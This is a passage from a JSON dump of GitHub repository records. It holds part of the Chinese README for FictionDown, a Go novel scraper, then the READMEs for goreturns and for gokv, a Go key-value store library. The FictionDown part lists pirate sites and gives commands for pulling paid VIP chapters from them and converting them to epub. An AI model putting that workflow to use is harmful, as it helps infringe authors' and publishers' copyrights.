txt\uff0c\u4ee5\u517c\u5bb9\u5927\u591a\u6570\u9605\u8bfb\u5668\n- \u652f\u6301\u5bfc\u51fa epub(\u8fd8\u6709\u4e9b\u95ee\u9898\uff0c\u67d0\u4e9b\u9605\u8bfb\u5668\u65e0\u6cd5\u6253\u5f00)\n- \u652f\u6301\u5bfc\u51fa markdown\uff0c\u53ef\u4ee5\u7528 pandoc \u8f6c\u6362\u6210 epub\uff0c\u9644\u5e26 epub \u7684`metadata`\uff0c\u4fdd\u7559\u4e66\u672c\u4fe1\u606f\u3001\u5377\u7ed3\u6784\u3001\u4f5c\u8005\u4fe1\u606f\n- \u5185\u7f6e\u7b80\u5355\u7684\u5e7f\u544a\u8fc7\u6ee4\uff08\u73b0\u5728\u8fd8\u4e0d\u5b8c\u5584\uff09\n- \u7528 Golang \u7f16\u5199\uff0c\u5b89\u88c5\u90e8\u7f72\u65b9\u4fbf\uff0c\u53ef\u9009\u7684\u5916\u90e8\u4f9d\u8d56\uff1aChromedp\n- 
\u652f\u6301\u65ad\u70b9\u7eed\u722c\uff0c\u5f3a\u5236\u7ed3\u675f\u518d\u722c\u4f1a\u5728\u4e0a\u6b21\u7ed3\u675f\u7684\u5730\u65b9\u7ee7\u7eed\n\n## \u7ad9\u70b9\u652f\u6301\n\n- \u662f\u5426\u6b63\u7248\uff1a\u2705 \u4e3a\u6b63\u7248\u7ad9\u70b9 \u274c \u4e3a\u76d7\u7248\u7ad9\u70b9\n- \u662f\u5426\u5206\u5377\uff1a\u2705 \u7ae0\u8282\u5206\u5377 \u274c \u6240\u6709\u7ae0\u8282\u653e\u5728\u4e00\u4e2a\u5377\u4e2d\u4e0d\u5206\u5377\n- \u7ad9\u5185\u641c\u7d22\uff1a\u2705 \u5b8c\u5168\u652f\u6301 \u274c \u4e0d\u652f\u6301 \u2754 \u7ad9\u70b9\u652f\u6301\u4f46\u8f6f\u4ef6\u672a\u9002\u914d \u26a0\ufe0f \u7ad9\u70b9\u652f\u6301\uff0c\u4f46\u4e0d\u53ef\u7528\u6216\u7ef4\u62a4\u4e2d \u26d4 \u7ad9\u70b9\u652f\u6301\u641c\u7d22\uff0c\u4f46\u6ca1\u6709\u597d\u7684\u9002\u914d\u65b9\u6848\uff08\u6bd4\u5982\u7528 Google \u505a\u7ad9\u5185\u641c\u7d22\uff09\n\n| \u7ad9\u70b9\u540d\u79f0 | \u7f51\u5740 | \u662f\u5426\u6b63\u7248 | \u662f\u5426\u5206\u5377 | \u652f\u6301\u7ad9\u5185\u641c\u7d22 | \u4ee3\u7801\u6587\u4ef6 |\n| ------------ | ----------------- | -------- | -------- | ------------ | ------------------------------ |\n| \u8d77\u70b9\u4e2d\u6587\u7f51 | www.qidian.com | \u2705 | \u2705 | \u2705 | sites\\com_qidian\\main.go |\n| \u7b14\u8da3\u9601 | www.b520.cc | \u274c | \u274c | \u2705 | sites\\cc_b520\\main.go |\n| \u9876\u70b9\u5c0f\u8bf4 | www.ddyueshu.com | \u274c | \u274c | \u2705 | sites\\com_ddyueshu\\main.go |\n| \u5168\u672c\u5c0f\u8bf4\u7f51 | www.qb5.la | \u274c | \u274c | \u2705 | sites\\la_qb5\\main.go |\n| \u65b0\u516b\u4e00\u4e2d\u6587\u7f51 | www.81new.net | \u274c | \u274c | \u2705 | sites\\net_new81\\main.go |\n| \u4e66\u8ff7\u697c | www.shumil.co | \u274c | \u274c | \u2705 | sites\\co_shumil\\main.go |\n| \u5b8c\u672c\u795e\u7ad9 | www.wanben.org | \u274c | \u274c | \u2705 | site\\org_wanben\\main.go |\n| 38 \u770b\u4e66 | www.mijiashe.com | \u274c | \u274c | \u26a0\ufe0f | sites\\com_mijiashe\\main.go |\n\n## \u4f7f\u7528\u6ce8\u610f\n\n- \u8d77\u70b9\u548c\u76d7\u7248\u7ad9\u7684\u9875\u9762\u53ef\u80fd\u968f\u65f6\u66f4\u6539\uff0c\u53ef\u80fd\u4f1a\u4f7f\u6293\u53d6\u5339\u914d\u5931\u6548\uff0c\u5982\u679c\u5931\u6548\u8bf7\u63d0 issue\n- \u751f\u6210\u7684 EPUB \u6587\u4ef6\u53ef\u80fd\u8fc7\u5927\uff0c\u5e02\u9762\u4e0a\u5927\u591a\u6570\u9605\u8bfb\u5668\u4f1a\u5f02\u5e38\u5361\u987f\u6216\u8005\u76f4\u63a5\u5d29\u6e83\n- \u67d0\u4e9b\u8fc7\u4e8e\u8001\u7684\u4e66\u6216\u8005\u4f5c\u8005\u9891\u7e41\u4fee\u6539\u7684\u4e66\uff0c\u76d7\u7248\u7ad9\u90fd\u6ca1\u6709\u6536\u5f55\uff0c\u4e5f\u5c31\u65e0\u6cd5\u722c\u53d6\uff0c\u5982\u80fd\u627e\u6b64\u4e66\u53ef\u7528\u7684\u76d7\u7248\u7ad9\u8bf7\u63d0 issue\uff0c\u5e76\u5199\u51fa\u4e66\u540d\u548c\u6b63\u7248\u7ad9\u94fe\u63a5\u3001\u76d7\u7248\u7ad9\u94fe\u63a5\n\n## \u5de5\u4f5c\u6d41\u7a0b\n\n1. \u8f93\u5165\u8d77\u70b9\u94fe\u63a5\n2. \u83b7\u53d6\u5230\u4e66\u672c\u4fe1\u606f\uff0c\u5f00\u59cb\u722c\u53d6\u6bcf\u7ae0\u5185\u5bb9\uff0c\u9047\u5230 vip \u7ae0\u8282\u653e\u5165`Example`\u4e2d\u4f5c\u4e3a\u6821\u5bf9\u6837\u672c\n3. \u624b\u52a8\u8bbe\u7f6e\u7b14\u8da3\u9601\u7b49\u76d7\u7248\u5c0f\u8bf4\u7684\u5bf9\u5e94\u94fe\u63a5\uff0c`tamp`\u5b57\u6bb5\n4. \u518d\u6b21\u542f\u52a8\uff0c\u5f00\u59cb\u722c\u53d6\uff0c\u53ea\u722c\u53d6 VIP \u90e8\u5206\uff0c\u5e76\u8ddf`Example`\u8fdb\u884c\u6821\u5bf9\n5. 
\u624b\u52a8\u7f16\u8f91\u5bf9\u5e94\u7684\u7f13\u5b58\u6587\u4ef6\uff0c\u624b\u52a8\u5220\u9664\u5e7f\u544a\u548c\u67d0\u4e9b\u968f\u673a\u5b57\u7b26(\u6709\u90e8\u5206\u662f\u5173\u952e\u5b57,\u53ef\u80fd\u4f1a\u5bfc\u81f4 pandoc \u5185\u5b58\u6ea2\u51fa\u6216\u8005\u6837\u5f0f\u9519\u8bef)\n6. `conv -f md`\u751f\u6210 markwown\n7. \u7528 pandoc \u8f6c\u6362\u6210 epub\uff0c`pandoc -o xxxx.epub xxxx.md`\n\n### Example\n\n```bash\n> ./FictionDown --url https://book.qidian.com/info/3249362 d # \u83b7\u53d6\u6b63\u7248\u4fe1\u606f\n\n# \u6709\u65f6\u4f1a\u53d1\u751f`not match volumes`\u7684\u9519\u8bef\uff0c\u8bf7\u542f\u7528Chromedp\u6216\u8005PhantomJS\n# Use Chromedp\n> ./FictionDown --url https://book.qidian.com/info/3249362 -d chromedp d\n# Use PhantomJS\n> ./FictionDown --url https://book.qidian.com/info/3249362 -d phantomjs d\n\n> vim \u4e00\u4e16\u4e4b\u5c0a.FictionDown # \u52a0\u5165\u76d7\u7248\u5c0f\u8bf4\u94fe\u63a5\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown d # \u83b7\u53d6\u76d7\u7248\u5185\u5bb9\n# \u722c\u53d6\u5b8c\u6bd5\u5c31\u53ef\u4ee5\u8f93\u51fa\u53ef\u9605\u8bfb\u7684\u6587\u6863\u4e86\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown conv -f txt\n# \u8f6c\u6362\u6210epub\u6709\u4e24\u79cd\u65b9\u5f0f\n# 1.\u8f93\u51famarkdown\uff0c\u518d\u7528pandoc\u8f6c\u6362\u6210epub\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown conv -f md\n> pandoc -o \u4e00\u4e16\u4e4b\u5c0a.epub \u4e00\u4e16\u4e4b\u5c0a.md\n# \u67d0\u4e9b\u9605\u8bfb\u5668\u9700\u8981\u5bf9\u7ae0\u8282\u8fdb\u884c\u5b9a\u4f4d,\u9700\u8981\u52a0\u4e0a--epub-chapter-level=2\n> pandoc -o \u4e00\u4e16\u4e4b\u5c0a.epub --epub-chapter-level=2 \u4e00\u4e16\u4e4b\u5c0a.md\n# 2.\u76f4\u63a5\u8f93\u51faepub\uff08\u8c03\u7528Pandoc\uff09\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown conv -f epub\n```\n\n#### \u53ef\u76f4\u63a5\u6839\u636e\u641c\u7d22\u7ed3\u679c\u76f4\u63a5\u4e0b\u8f7d\uff08\u5f53\u5b58\u5728\u81f3\u5c11\u4e00\u4e2a\u6b63\u7248\u6e90\u65f6\u53ef\u7528\uff09\n\n```bash\n> ./FictionDown s -d -k \"\u8be1\u79d8\u4e4b\u4e3b\"\n```\n\n#### \u7ad9\u5185\u641c\u7d22\uff0c\u7136\u540e\u586b\u5165\n\n```bash\n> ./FictionDown --url https://book.qidian.com/info/3249362 d # \u83b7\u53d6\u6b63\u7248\u4fe1\u606f\n\n# \u6709\u65f6\u4f1a\u53d1\u751f`not match volumes`\u7684\u9519\u8bef\uff0c\u8bf7\u542f\u7528Chromedp\u6216\u8005PhantomJS\n# Use Chromedp\n> ./FictionDown --url https://book.qidian.com/info/3249362 --driver chromedp d\n# Use PhantomJS\n> ./FictionDown --url https://book.qidian.com/info/3249362 --driver phantomjs d\n\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown s -k \u4e00\u4e16\u4e4b\u5c0a -p # \u641c\u7d22\u7136\u540e\u653e\u5165\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown d # \u83b7\u53d6\u76d7\u7248\u5185\u5bb9\n# \u722c\u53d6\u5b8c\u6bd5\u5c31\u53ef\u4ee5\u8f93\u51fa\u53ef\u9605\u8bfb\u7684\u6587\u6863\u4e86\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown conv -f txt\n# \u8f6c\u6362\u6210epub\u6709\u4e24\u79cd\u65b9\u5f0f\n# 1.\u8f93\u51famarkdown\uff0c\u518d\u7528pandoc\u8f6c\u6362\u6210epub\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown conv -f md\n> pandoc -o \u4e00\u4e16\u4e4b\u5c0a.epub \u4e00\u4e16\u4e4b\u5c0a.md\n# 2.\u76f4\u63a5\u8f93\u51faepub\uff08\u67d0\u4e9b\u9605\u8bfb\u5668\u4f1a\u62a5\u9519\uff09\n> ./FictionDown -i \u4e00\u4e16\u4e4b\u5c0a.FictionDown conv -f epub\n```\n\n## \u672a\u5b9e\u73b0\n\n- 
\u722c\u53d6\u6b63\u7248\u7684\u65f6\u5019\u5e26\u4e0a`Cookie`\uff0c\u7528\u4e8e\u722c\u53d6\u5df2\u8d2d\u4e70\u7ae0\u8282\n- \u652f\u6301 \u664b\u6c5f\u6587\u5b66\u57ce\n- \u652f\u6301 \u7eb5\u6a2a\u4e2d\u6587\u7f51\n- \u652f\u6301\u6709\u6bd2\u5c0f\u8bf4\u7f51\n- \u652f\u6301\u523a\u732c\u732b\uff08\u5373\u201c\u6b22\u4e50\u4e66\u5ba2\u201d\uff09\n- \u6574\u7406 main \u5305\u4e2d\u7684\u9762\u6761\u903b\u8f91\n- \u6574\u7406\u547d\u4ee4\u884c\u53c2\u6570\u98ce\u683c\n- \u5b8c\u5584\u5e7f\u544a\u8fc7\u6ee4\n- \u7b80\u5316\u4f7f\u7528\u6b65\u9aa4\n- \u4f18\u5316 log \u8f93\u51fa\n- \u5bf9\u4e8e\u7279\u6b8a\u7ae0\u8282\uff0c\u652f\u6301\u624b\u52a8\u6307\u5b9a\u76d7\u7248\u94fe\u63a5\u6216\u8005\u8df3\u8fc7\u5ffd\u7565\n- \u5916\u90e8\u52a0\u8f7d\u5339\u914d\u89c4\u5219\uff0c\u8ba9\u7528\u6237\u53ef\u4ee5\u81ea\u5df1\u6dfb\u52a0\u6b63/\u76d7\u7248\u6e90\n- \u652f\u6301\u7ae0\u8282\u66f4\u65b0\n- \u7ae0\u8282\u5339\u914d\u8fc7\u7a0b\u4f18\u5316\n\n## Usage\n\n```bash\nNAME:\n FictionDown - https://github.com/ma6254/FictionDown\n\nUSAGE:\n [global options] command [command options] [arguments...]\n\nAUTHOR:\n ma6254 <9a6c5609806a@gmail.com>\n\nCOMMANDS:\n download, d, down \u4e0b\u8f7d\u7f13\u5b58\u6587\u4ef6\n check, c, chk \u68c0\u67e5\u7f13\u5b58\u6587\u4ef6\n edit, e \u5bf9\u7f13\u5b58\u6587\u4ef6\u8fdb\u884c\u624b\u52a8\u4fee\u6539\n convert, conv \u8f6c\u6362\u683c\u5f0f\u8f93\u51fa\n pirate, p \u68c0\u7d22\u76d7\u7248\u7ad9\u70b9\n search, s \u68c0\u7d22\u76d7\u7248\u7ad9\u70b9\n help, h Shows a list of commands or help for one command\n\nGLOBAL OPTIONS:\n -u value, --url value \u56fe\u4e66\u94fe\u63a5\n --tu value, --turl value \u8d44\u6e90\u7f51\u7ad9\u94fe\u63a5\n -i value, --input value \u8f93\u5165\u7f13\u5b58\u6587\u4ef6\n --log value log file path\n --driver value, -d value \u8bf7\u6c42\u65b9\u5f0f,support: none,phantomjs,chromedp\n --help, -h show help\n --version, -v print the version\n```\n\n## \u5b89\u88c5\u548c\u7f16\u8bd1\n\n\u7a0b\u5e8f\u4e3a\u5355\u6267\u884c\u6587\u4ef6\uff0c\u547d\u4ee4\u884c CLI \u754c\u9762\n\n\u5305\u7ba1\u7406\u4e3a gomod\n\n```bash\ngo get github.com/ma6254/FictionDown\n```\n\n\u4ea4\u53c9\u7f16\u8bd1\u8fd9\u51e0\u4e2a\u5e73\u53f0\u7684\u53ef\u6267\u884c\u6587\u4ef6\uff1a`linux/arm` `linux/amd64` `darwin/amd64` `windows/amd64`\n\n```bash\nmake multiple_build\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sqs/goreturns", "link": "https://github.com/sqs/goreturns", "tags": [], "stars": 517, "description": "A gofmt/goimports-like tool for Go programmers that fills in Go return statements with zero values to match the func return types", "lang": "Go", "repo_lang": "", "readme": "This tool adds zero-value return values to incomplete Go return\nstatements, to save you time when writing Go. 
It is inspired by\nand based on goimports.\n\n![short screencast](screencast.gif)\n\nfull 30-second screencast: http://youtu.be/hyEMO9vtKZ8\n\nFor example, the following incomplete return statement:\n\n\tfunc F() (*MyType, int, error) { return errors.New(\"foo\") }\n\nis made complete by adding nil and 0 returns (the zero values for\n*MyType and int):\n\n\tfunc F() (*MyType, int, error) { return nil, 0, errors.New(\"foo\") }\n\nTo install:\n\n\tgo get -u github.com/sqs/goreturns\n\nTo run:\n\n\tgoreturns file.go\n\nTo view a diff showing what it'd do on a sample file:\n\n\tgoreturns -d $GOPATH/github.com/sqs/goreturns/_sample/a.go\n\nEditor integration: replace gofmt or goimports in your post-save hook\nwith goreturns. By default goreturns calls goimports on files before\nperforming its own processing.\n\nIt acts the same as gofmt (same flags, etc) but in addition to code\nformatting, also fixes returns.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "philippgille/gokv", "link": "https://github.com/philippgille/gokv", "tags": ["go", "golang", "key-value", "key-value-store", "library", "package", "abstraction", "simple", "redis", "bolt", "boltdb", "consul", "badgerdb", "database", "etcd", "dynamodb", "mongodb", "memcached", "cloud-storage", "postgresql"], "stars": 517, "description": "Simple key-value store abstraction and implementations for Go (Redis, Consul, etcd, bbolt, BadgerDB, LevelDB, Memcached, DynamoDB, S3, PostgreSQL, MongoDB, CockroachDB and many more)", "lang": "Go", "repo_lang": "", "readme": "gokv\n====\n\n[![Go Reference](https://pkg.go.dev/badge/github.com/philippgille/gokv.svg)](https://pkg.go.dev/github.com/philippgille/gokv)\n[![Build status](https://github.com/philippgille/gokv/actions/workflows/test.yml/badge.svg)](https://github.com/philippgille/gokv/actions/workflows/test.yml)\n[![Go Report Card](https://goreportcard.com/badge/github.com/philippgille/gokv)](https://goreportcard.com/report/github.com/philippgille/gokv)\n[![codecov](https://codecov.io/gh/philippgille/gokv/branch/master/graph/badge.svg)](https://codecov.io/gh/philippgille/gokv)\n[![GitHub Releases](https://img.shields.io/github/release/philippgille/gokv.svg)](https://github.com/philippgille/gokv/releases)\n[![Mentioned in Awesome Go](https://awesome.re/mentioned-badge.svg)](https://github.com/avelino/awesome-go)\n\nSimple key-value store abstraction and implementations for Go\n\nContents\n--------\n\n1. [Features](#features)\n 1. [Simple interface](#simple-interface)\n 2. [Implementations](#implementations)\n 3. [Value types](#value-types)\n 4. [Marshal formats](#marshal-formats)\n 5. [Roadmap](#roadmap)\n2. [Usage](#usage)\n3. [Project status](#project-status)\n4. [Motivation](#motivation)\n5. [Design decisions](#design-decisions)\n6. [Related projects](#related-projects)\n7. [License](#license)\n\nFeatures\n--------\n\n### Simple interface\n\n> Note: The interface is not final yet! See [Project status](#project-status) for details.\n\n```go\ntype Store interface {\n Set(k string, v interface{}) error\n Get(k string, v interface{}) (found bool, err error)\n Delete(k string) error\n Close() error\n}\n```\n\nThere are detailed descriptions of the methods in the [docs](https://pkg.go.dev/badge/github.com/philippgille/gokv#Store) and in the [code](https://github.com/philippgille/gokv/blob/master/store.go). 
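As a rough illustration of what the contract asks of an implementer, here is a minimal, hypothetical in-memory `Store` (it is not one of the packages shipped with gokv and exists only as a sketch; it marshals values to JSON using nothing but the standard library):\n\n```go\npackage mystore\n\nimport (\n \"encoding/json\"\n \"sync\"\n)\n\n// Store is a toy in-memory key-value store satisfying the interface above.\ntype Store struct {\n mu sync.RWMutex\n m map[string][]byte\n}\n\nfunc NewStore() *Store {\n return &Store{m: make(map[string][]byte)}\n}\n\n// Set marshals v (to JSON here, for simplicity) and stores it under k.\nfunc (s *Store) Set(k string, v interface{}) error {\n data, err := json.Marshal(v)\n if err != nil {\n return err\n }\n s.mu.Lock()\n defer s.mu.Unlock()\n s.m[k] = data\n return nil\n}\n\n// Get unmarshals the stored value into v and reports whether k was found.\nfunc (s *Store) Get(k string, v interface{}) (bool, error) {\n s.mu.RLock()\n data, ok := s.m[k]\n s.mu.RUnlock()\n if !ok {\n return false, nil\n }\n return true, json.Unmarshal(data, v)\n}\n\n// Delete removes k; deleting a missing key is not an error.\nfunc (s *Store) Delete(k string) error {\n s.mu.Lock()\n defer s.mu.Unlock()\n delete(s.m, k)\n return nil\n}\n\n// Close is a no-op for a purely in-memory store.\nfunc (s *Store) Close() error {\n return nil\n}\n```\n\nReal implementations additionally follow the exact semantics spelled out in the method descriptions linked above. 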
You should read them if you plan to write your own `gokv.Store` implementation or if you create a Go package with a method that takes a `gokv.Store` as parameter, so you know exactly what happens in the background.\n\n### Implementations\n\nSome of the following databases aren't specifically engineered for storing key-value pairs, but if someone's running them already for other purposes and doesn't want to set up one of the proper key-value stores due to administrative overhead etc., they can of course be used as well. In those cases let's focus on a few of the most popular though. This mostly goes for the SQL, NoSQL and NewSQL categories.\n\nFeel free to suggest more stores by creating an [issue](https://github.com/philippgille/gokv/issues) or even add an actual implementation - [![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](http://makeapullrequest.com).\n\nFor differences between the implementations, see [Choosing an implementation](docs/choosing-implementation.md). \nFor the Godoc of specific implementations, see .\n\n- Local in-memory\n - [X] Go `sync.Map`\n - [X] Go `map` (with `sync.RWMutex`)\n - [X] [FreeCache](https://github.com/coocood/freecache)\n - [X] [BigCache](https://github.com/allegro/bigcache)\n- Embedded\n - [X] [bbolt](https://github.com/etcd-io/bbolt) (formerly known as [Bolt / Bolt DB](https://github.com/boltdb/bolt))\n - [X] [BadgerDB](https://github.com/dgraph-io/badger)\n - [X] [LevelDB / goleveldb](https://github.com/syndtr/goleveldb)\n - [X] Local files (one file per key-value pair, with the key being the filename and the value being the file content)\n- Distributed store\n - [X] [Redis](https://github.com/antirez/redis)\n - [X] [Consul](https://github.com/hashicorp/consul)\n - [X] [etcd](https://github.com/etcd-io/etcd)\n - [X] [Apache ZooKeeper](https://github.com/apache/zookeeper)\n - [ ] [TiKV](https://github.com/tikv/tikv)\n- Distributed cache (no presistence *by default*)\n - [X] [Memcached](https://github.com/memcached/memcached)\n - [X] [Hazelcast](https://github.com/hazelcast/hazelcast)\n- Cloud\n - [X] [Amazon DynamoDB](https://aws.amazon.com/dynamodb/)\n - [X] [Amazon S3](https://aws.amazon.com/s3/) / [Google Cloud Storage](https://cloud.google.com/storage/) / [Alibaba Cloud Object Storage Service (OSS)](https://www.alibabacloud.com/en/product/oss) / [DigitalOcean Spaces](https://www.digitalocean.com/products/spaces/) / [Scaleway Object Storage](https://www.scaleway.com/object-storage/) / [OpenStack Swift](https://github.com/openstack/swift) / [Ceph](https://github.com/ceph/ceph) / [Minio](https://github.com/minio/minio) / ...\n - [ ] [Azure Cosmos DB](https://azure.microsoft.com/en-us/services/cosmos-db/)\n - [X] [Azure Table Storage](https://azure.microsoft.com/en-us/services/storage/tables/)\n - [X] [Google Cloud Datastore](https://cloud.google.com/datastore/)\n - [ ] [Google Cloud Firestore](https://cloud.google.com/firestore/)\n - [X] [Alibaba Cloud Table Store](https://www.alibabacloud.com/de/product/table-store)\n- SQL\n - [X] [MySQL](https://github.com/mysql/mysql-server)\n - [X] [PostgreSQL](https://github.com/postgres/postgres)\n- NoSQL\n - [X] [MongoDB](https://github.com/mongodb/mongo)\n - [ ] [Apache Cassandra](https://github.com/apache/cassandra)\n- \"NewSQL\"\n - [X] [CockroachDB](https://github.com/cockroachdb/cockroach)\n - [ ] [TiDB](https://github.com/pingcap/tidb)\n- Multi-model\n - [X] [Apache Ignite](https://github.com/apache/ignite)\n - [ ] [ArangoDB](https://github.com/arangodb/arangodb)\n - [ ] 
[OrientDB](https://github.com/orientechnologies/orientdb)\n\nAgain: \nFor differences between the implementations, see [Choosing an implementation](docs/choosing-implementation.md). \nFor the Godoc of specific implementations, see .\n\n### Value types\n\nMost Go packages for key-value stores just accept a `[]byte` as value, which requires developers for example to marshal (and later unmarshal) their structs. `gokv` is meant to be simple and make developers' lifes easier, so it accepts any type (with using `interface{}` as parameter), including structs, and automatically (un-)marshals the value.\n\nThe kind of (un-)marshalling is left to the implementation. All implementations in this repository currently support JSON and [gob](https://blog.golang.org/gobs-of-data) by using the `encoding` subpackage in this repository, which wraps the core functionality of the standard library's `encoding/json` and `encoding/gob` packages. See [Marshal formats](#marshal-formats) for details.\n\nFor unexported struct fields to be (un-)marshalled to/from JSON/gob, the respective custom (un-)marshalling methods need to be implemented as methods of the struct (e.g. `MarshalJSON() ([]byte, error)` for custom marshalling into JSON). See [Marshaler](https://pkg.go.dev/encoding/json#Marshaler) and [Unmarshaler](https://pkg.go.dev/encoding/json#Unmarshaler) for JSON, and [GobEncoder](https://pkg.go.dev/encoding/gob#GobEncoder) and [GobDecoder](https://pkg.go.dev/encoding/gob#GobDecoder) for gob.\n\nTo improve performance you can also implement the custom (un-)marshalling methods so that no reflection is used by the `encoding/json` / `encoding/gob` packages. This is not a disadvantage of using a generic key-value store package, it's the same as if you would use a concrete key-value store package which only accepts `[]byte`, requiring you to (un-)marshal your structs.\n\n### Marshal formats\n\nThis repository contains the subpackage `encoding`, which is an abstraction and wrapper for the core functionality of packages like `encoding/json` and `encoding/gob`. The currently supported marshal formats are:\n\n- [X] JSON\n- [X] [gob](https://blog.golang.org/gobs-of-data)\n\nMore formats will be supported in the future (e.g. XML).\n\nThe stores use this `encoding` package to marshal and unmarshal the values when storing / retrieving them. The default format is JSON, but all `gokv.Store` implementations in this repository also support [gob](https://blog.golang.org/gobs-of-data) as alternative, configurable via their `Options`.\n\nThe marshal format is up to the implementations though, so package creators using the `gokv.Store` interface as parameter of a function should not make any assumptions about this. 
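For instance, a package creator might expose helpers like the following (illustrative code only, not part of gokv; `User`, `SaveUser` and `LoadUser` are made-up names), which work unchanged no matter which codec the chosen store uses:\n\n```go\npackage userstore\n\nimport \"github.com/philippgille/gokv\"\n\n// User is an example application type; any struct the configured codec can (un-)marshal works here.\ntype User struct {\n ID string\n Name string\n}\n\n// SaveUser persists u under its ID, making no assumption about the store's marshal format.\nfunc SaveUser(store gokv.Store, u User) error {\n return store.Set(u.ID, u)\n}\n\n// LoadUser retrieves the user stored under id and reports whether it exists.\nfunc LoadUser(store gokv.Store, id string) (User, bool, error) {\n var u User\n found, err := store.Get(id, &u)\n return u, found, err\n}\n```\n\n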
If they require any specific format they should inform the package user about this in the GoDoc of the function taking the store interface as parameter.\n\nDifferences between the formats:\n\n- Depending on the struct, one of the formats might be faster\n- Depending on the struct, one of the formats might lead to a lower storage size\n- Depending on the use case, the custom (un-)marshal methods of one of the formats might be easier to implement\n - JSON: [`MarshalJSON() ([]byte, error)`](https://pkg.go.dev/encoding/json#Marshaler) and [`UnmarshalJSON([]byte) error`](https://pkg.go.dev/encoding/json#Unmarshaler)\n - gob: [`GobEncode() ([]byte, error)`](https://pkg.go.dev/encoding/gob#GobEncoder) and [`GobDecode([]byte) error`](https://pkg.go.dev/encoding/gob#GobDecoder)\n\n### Roadmap\n\n- Benchmarks!\n- CLI: A simple command line interface tool that allows you create, read, update and delete key-value pairs in all of the `gokv` storages\n- A `combiner` package that allows you to create a `gokv.Store` which forwards its call to multiple implementations at the same time. So for example you can use `memcached` and `s3` simultaneously to have 1) super fast access but also 2) durable redundant persistent storage.\n- A way to directly configure the clients via the options of the underlying used Go package (e.g. not the `redis.Options` struct in `github.com/philippgille/gokv`, but instead the `redis.Options` struct in `github.com/go-redis/redis`)\n - Will be optional and discouraged, because this will lead to compile errors in code that uses `gokv` when switching the underlying used Go package, but definitely useful for some people\n- More stores (see stores in [Implementations](#implementations) list with unchecked boxes)\n- Maybe rename the project from `gokv` to `SimpleKV`?\n- Maybe move all implementation packages into a subdirectory, e.g. `github.com/philippgille/gokv/store/redis`?\n\nUsage\n-----\n\nFirst, download the [module](https://github.com/golang/go/wiki/Modules) you want to work with:\n\n- For example when you want to work with the `gokv.Store` interface:\n - `go get github.com/philippgille/gokv@latest`\n- For example when you want to work with the Redis implementation:\n - `go get github.com/philippgille/gokv/redis@latest`\n\nThen you can import and use it.\n\nEvery implementation has its own `Options` struct, but all implementations have a `NewStore()` / `NewClient()` function that returns an object of a sctruct that implements the `gokv.Store` interface. 
Let's take the implementation for Redis as example, which is the most popular distributed key-value store.\n\n```go\npackage main\n\nimport (\n \"fmt\"\n\n \"github.com/philippgille/gokv\"\n \"github.com/philippgille/gokv/redis\"\n)\n\ntype foo struct {\n Bar string\n}\n\nfunc main() {\n options := redis.DefaultOptions // Address: \"localhost:6379\", Password: \"\", DB: 0\n\n // Create client\n client, err := redis.NewClient(options)\n if err != nil {\n panic(err)\n }\n defer client.Close()\n\n // Store, retrieve, print and delete a value\n interactWithStore(client)\n}\n\n// interactWithStore stores, retrieves, prints and deletes a value.\n// It's completely independent of the store implementation.\nfunc interactWithStore(store gokv.Store) {\n // Store value\n val := foo{\n Bar: \"baz\",\n }\n err := store.Set(\"foo123\", val)\n if err != nil {\n panic(err)\n }\n\n // Retrieve value\n retrievedVal := new(foo)\n found, err := store.Get(\"foo123\", retrievedVal)\n if err != nil {\n panic(err)\n }\n if !found {\n panic(\"Value not found\")\n }\n\n fmt.Printf(\"foo: %+v\", *retrievedVal) // Prints `foo: {Bar:baz}`\n\n // Delete value\n err = store.Delete(\"foo123\")\n if err != nil {\n panic(err)\n }\n}\n```\n\nAs described in the comments, that code does the following:\n\n1. Create a client for Redis\n - Some implementations' stores/clients don't require to be closed, but when working with the interface (for example as function parameter) you *must* call `Close()` because you don't know which implementation is passed. Even if you work with a specific implementation you *should* always call `Close()`, so you can easily change the implementation without the risk of forgetting to add the call.\n2. Call `interactWithStore()`, which requires a `gokv.Store` as parameter. This method then:\n 1. Stores an object of type `foo` in the Redis server running on `localhost:6379` with the key `foo123`\n 2. Retrieves the value for the key `foo123`\n - The check if the value was found isn't needed in this example but is included for demonstration purposes\n 3. Prints the value. It prints `foo: {Bar:baz}`, which is exactly what was stored before.\n 4. Deletes the value\n\nNow let's say you don't want to use Redis but Consul instead. You just have to make three simple changes:\n\n1. Replace the import of `\"github.com/philippgille/gokv/redis\"` by `\"github.com/philippgille/gokv/consul\"`\n2. Replace `redis.DefaultOptions` by `consul.DefaultOptions`\n3. Replace `redis.NewClient(options)` by `consul.NewClient(options)`\n\nEverything else works the same way. `interactWithStore()` is completely unaffected.\n\nProject status\n--------------\n\n> Note: `gokv`'s API is not stable yet and is under active development. Upcoming releases are likely to contain breaking changes as long as the version is `v0.x.y`. You should use vendoring to prevent bad surprises. This project adheres to [Semantic Versioning](http://semver.org/spec/v2.0.0.html) and all notable changes to this project are documented in [RELEASES.md](https://github.com/philippgille/gokv/blob/master/RELEASES.md).\n\nPlanned interface methods until `v1.0.0`:\n\n- `List(interface{}) error` / `GetAll(interface{}) error` or similar\n\nThe interface might even change until `v1.0.0`. 
For example one consideration is to change `Get(string, interface{}) (bool, error)` to `Get(string, interface{}) error` (no boolean return value anymore), with the `error` being something like `gokv.ErrNotFound // \"Key-value pair not found\"` to fulfill the additional role of indicating that the key-value pair wasn't found. But at the moment we prefer the current method signature.\n\nAlso, more interfaces might be added. For example so that there's a `SimpleStore` and an `AdvancedStore`, with the first one containing only the basic methods and the latter one with advanced features such as key-value pair lifetimes (deletion of key-value pairs after a given time), notification of value changes via Go channels etc. But currently the focus is simplicity, see [Design decisions](#design-decisions).\n\nMotivation\n----------\n\nWhen creating a package you want the package to be usable by as many developers as possible. Let's look at a specific example: You want to create a paywall middleware for 